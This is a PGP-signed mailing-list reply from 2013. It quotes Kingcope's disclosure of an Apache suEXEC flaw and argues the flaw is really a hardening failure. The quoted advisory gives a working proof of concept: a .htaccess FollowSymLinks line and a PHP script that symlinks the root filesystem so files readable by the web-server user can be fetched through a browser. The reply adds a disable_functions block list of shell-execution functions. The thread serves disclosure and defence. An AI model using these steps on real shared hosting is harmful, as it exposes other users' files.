--cCCUtJNjaMSDCm71st48On1O3ftb6aQXx
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Am 09.08.2013 09:29, schrieb Kingcope:
> So what your Emails Tell me is better ignore this vulnerability. I dont=
Claim its a High severity Bug but if you Tell People to ignore it Becaus=
e it isnt a vulnerability you are very much aiding the Chaos of insecurit=
y in the Internet today. You Maybe have a Secure Setting but theres only =
you on the Planet. Attackers Look specifically for such Bugs to Open Serv=
ers. No Wonder we have compromises in a High Scale every Day due to this =
ignorance. My rant on that One.
>> The above php script will simply create a symbolic link to '/'
>> A request to test99.php/etc/testapache done with a web browser shows..=
>> voila! read with the apache uid/gid
if the script is possible to do so the admin did not his homework
on shared servers have symlink amd system-functions to be disabled
period
disable_functions =3D "exec, passthru, shell_exec, system, proc_open, pr=
oc_close, proc_nice, proc_terminate,
proc_get_status, pcntl_exec, apache_child_terminate, posix_kill, posix_mk=
fifo, posix_setpgid, posix_setsid,
posix_setuid, mail, symlink, link, dl, get_current_user, getmypid, getmyu=
id, getrusage, pfsockopen, socket_accept,
socket_bind, openlog, syslog"
> Am 07.08.2013 um 21:49 schrieb king cope <isowarez.isowarez.isowarez@go=
oglemail.com>:
>=20
>> Apache suEXEC privilege elevation / information disclosure
>>
>> Discovered by Kingcope/Aug 2013
>>
>> The suEXEC feature provides Apache users the ability to run CGI and SS=
I programs
>> under user IDs different from the user ID of the calling web server. N=
ormally,
>> when a CGI or SSI program executes, it runs as the same user who is ru=
nning the
>> web server.
>> Used properly, this feature can reduce considerably the security risks=
involved
>> with allowing users to develop and run private CGI or SSI programs.
>>
>> With this bug an attacker who is able to run php or cgi code inside a =
web
>> hosting environment and the environment is configured to use suEXEC as=
a
>> protection mechanism, he/she is able to read any file and directory on=
the file-
>> system of the UNIX/Linux system with the user and group id of the
>> apache web server.
>>
>> Normally php and cgi scripts are not allowed to read files with the ap=
ache user-
>> id inside a suEXEC configured environment.
>>
>> Take for example this apache owned file and the php script that follow=
s.
>>
>> $ ls -la /etc/testapache
>> -rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache
>> only user www-data should be able to read this file.
>>
>> $ cat test.php
>> <?php
>> system("id; cat /etc/testapache");
>> ?>
>>
>> When calling the php file using a webbrowser it will show...
>> uid=3D1002(example) gid=3D1002(example) groups=3D1002(example)
>>
>> because the php script is run trough suEXEC.
>> The script will not output the file requested because of a permissions=
error.
>>
>> Now if we create a .htaccess file with the content...
>> Options Indexes FollowSymLinks
>>
>> and a php script with the content...
>>
>> <?php
>> system("ln -sf / test99.php");
>> symlink("/", "test99.php"); // try builtin function in case whe=
n
>> //system() is blocked
>> ?>
>> in the same folder
>>
>> ..we can access the root filesystem with the apache uid,gid by
>> requesting test99.php.
>> The above php script will simply create a symbolic link to '/'.
>>
>> A request to test99.php/etc/testapache done with a web browser shows..=
>> voila! read with the apache uid/gid
>>
>> The reason we can now read out any files and traverse directories owne=
d by the
>> apache user is because apache httpd displays symlinks and directory li=
stings
>> without querying suEXEC.
>> It is not possible to write to files in this case.
>>
>> Version notes. Assumed is that all Apache versions are affected by thi=
s bug.
>>
>> apache2 -V
>> Server version: Apache/2.2.22 (Debian)
>> Server built: Mar 4 2013 21:32:32
>> Server's Module Magic Number: 20051115:30
>> Server loaded: APR 1.4.6, APR-Util 1.4.1
>> Compiled using: APR 1.4.6, APR-Util 1.4.1
>> Architecture: 32-bit
>> Server MPM: Worker
>> threaded: yes (fixed thread count)
>> forked: yes (variable process count)
>> Server compiled with....
>> -D APACHE_MPM_DIR=3D"server/mpm/worker"
>> -D APR_HAS_SENDFILE
>> -D APR_HAS_MMAP
>> -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
>> -D APR_USE_SYSVSEM_SERIALIZE
>> -D APR_USE_PTHREAD_SERIALIZE
>> -D APR_HAS_OTHER_CHILD
>> -D AP_HAVE_RELIABLE_PIPED_LOGS
>> -D DYNAMIC_MODULE_LIMIT=3D128
>> -D HTTPD_ROOT=3D"/etc/apache2"
>> -D SUEXEC_BIN=3D"/usr/lib/apache2/suexec"
>> -D DEFAULT_PIDLOG=3D"/var/run/apache2.pid"
>> -D DEFAULT_SCOREBOARD=3D"logs/apache_runtime_status"
>> -D DEFAULT_ERRORLOG=3D"logs/error_log"
>> -D AP_TYPES_CONFIG_FILE=3D"mime.types"
>> -D SERVER_CONFIG_FILE=3D"apache2.conf"
>>
>> Cheers,
>> /Kingcope
--cCCUtJNjaMSDCm71st48On1O3ftb6aQXx
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iEYEARECAAYFAlIEy44ACgkQhmBjz394AnmGpACfVzB2pca8Au1nNHtBhZYDrfrw
oTwAnjQO4B7FDhLK68QK6YKH4StOZKb/
=XfJj
-----END PGP SIGNATURE-----
--cCCUtJNjaMSDCm71st48On1O3ftb6aQXx--